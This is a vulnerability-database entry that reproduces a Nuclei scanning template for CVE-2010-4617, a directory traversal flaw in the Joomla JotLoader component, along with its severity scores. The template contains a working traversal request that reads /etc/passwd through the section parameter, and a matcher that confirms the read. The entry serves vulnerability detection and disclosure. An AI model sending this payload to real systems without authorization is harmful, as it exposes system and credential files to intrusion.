Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-4617
HistoryAug 05, 2021 - 1:36 a.m.

Joomla! Component JotLoader 2.2.1 - Local File Inclusion

2021-08-0501:36:32
ProjectDiscovery
github.com
2

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.1%

A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.

id: CVE-2010-4617

info:
  name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15791
    - https://nvd.nist.gov/vuln/detail/CVE-2010-4617
    - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-4617
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.80104
    cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kanich
    product: com_jotloader
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204933fa3b4ca21398fbcd1ce68db7fa44c963d2d530bbafbe0405fc0e5112db32022100ab0c92e462dd2e49ea684140fb5a8d3ba7c9fa7b1a6f1f657c4b49adba8fc93c:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.1%